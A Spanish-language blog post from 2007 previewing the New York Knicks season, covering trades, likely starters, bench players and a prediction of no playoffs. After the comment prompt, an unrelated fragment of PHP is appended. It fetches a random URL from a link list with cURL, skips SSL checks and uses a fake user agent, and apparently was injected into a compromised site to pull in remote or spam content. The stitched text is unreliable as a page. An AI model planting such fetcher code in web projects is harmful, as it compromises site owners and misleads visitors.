New York Knicks: el enemigo en casa

05 de October de 2007 por txusma

Spyke Lee sonreía. Parecía que el horizonte se aclaraba. Los contratos de Shannon Anderson, Jalen Rose, Maurice Taylor y, sobretodo, Allan Houston finalizaban, dando un respiro a una economía ya acostumbrada al impuesto de lujo. Quedaban aún en nómina jugadores como Jerome James, Jerome Williams o Malik Rose cobrando cada uno más de 6.000.000 de dólares por temporada pero su presencia se compensaba con un grupo de jóvenes que podían tomar las riendas en momentos determinados y que habían respondido muy bien ante las adversidades. Sobre todo David Lee había demostrado una intensidad y una madurez excepcionales, reboteando con fiereza y ganándose los galones en muchas fases de la temporada, incluso con canastas ganadoras. Definitivamente estaba preparado para jugar al lado de Eddie Curry en el juego interior.

Pero Isaiah Thomas no debía verlo así. Sorprendiendo a todos, la misma noche del draft envió a Frye y Steve Francis a Portland a cambio de Zach Randolph , con lo que consiguió a otro PF de gran calidad. Junto a Curry, Zach debería formar una de las parejas interiores más poderosas del Este y, con el recambio de David Lee, New York habría de ser capaz de mantener ese poderío durante los 48 minutos del partido.

Pero si el juego interior parece a priori de los mejores de la liga, no se puede decir lo mismo, ni mucho menos, de su juego exterior. Marbury continuará un año más perdido en el juego de Thomas sin saber si imitar a Stockton o volver a ser el que era. Con esta indecisión, lo más seguro es que Marbury continúe con sus registros, alejados de tiempos mejores en los que llegaba a promediar 20 puntos y 9 asistencias. A su lado es probable que siga jugando Quentin ‘Racheado’ Richardson. Como su sobrenombre indica, Quentin es un jugador de rachas, capaz de anotar 30 puntos en un partido y 5 en el siguiente, un jugador al que no le quema la pelota en las manos porque acostumbra a lanzar en cuanto pasa por ellas. Un auténtico microondas que posiblemente haría una mejor función apareciendo desde el banquillo. Otro jugador de las mismas características es Jamaal Crawford, que debido a la falta de calidad en la posiciones de base y escolta es más que probable que cuente nuevamente con muchos minutos en esta temporada.

Estos cinco nombres (Marbury, Crawford, Richardson, Randolph y Curry) podrían formar el quinteto inicial de los New York Knicks. 5 hombres acostumbrados a mirar primero a canasta y después a sus compañeros, a tirar los tiros decisivos y no tan decisivos, a absorber mucho juego ofensivo. A priori, mucha redundancia. Pero ¿qué queda aparte de estos 5 jugadores? El jugador más destacado en el banco es el ya mencionado David Lee. A su lado aparecen otros jugadores aprovechables, como el pequeño Nate Robinson, ganador del concurso de mates hace 2 años y de un corte similar a sus compañeros, Jared Jeffries, claro ejemplo de jugador de equipo, o Renaldo Balkman. El jugador de South Carolina fue elegido en la 20ª posición del draft de 2006, provocando las iras de los aficionados y la sorpresa de los periodistas. Su nombre no aparecía en ninguna quiniela y lo más probable es que hubiera quedado fuera del draft de no ser por Thomas. Pero Balkman ha aportado una lucha y una garra que han contagiado al grupo en más de una ocasión, ganándose el cariño del Madison Square Garden. Con más minutos este año podrá seguir demostrando su polivalencia y versatilidad e incluso no se descarta que pueda ser titular en alguna ocasión.

Un año más no se puede esperar mucho de estos Knicks que parece que tienen el enemigo en casa. Plantilla descompensada aunque no exenta de calidad, redundancia en las posiciones, jugadores de corte parecido… no son buenos mimbres para una temporada exitosa, así que los aficionados neoyorquinos deberán ver de nuevo los Playoffs desde el salón de su casa. Mala suerte para un Spyke Lee al que se le ha congelado la sonrisa.

Quinteto: Stephon Marbury, Jamaal Crawford, Quentin Richardson, Zach Randolph y Eddie Curry
Sexto hombre: David Lee

Pronóstico: Fuera de Playoffs

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>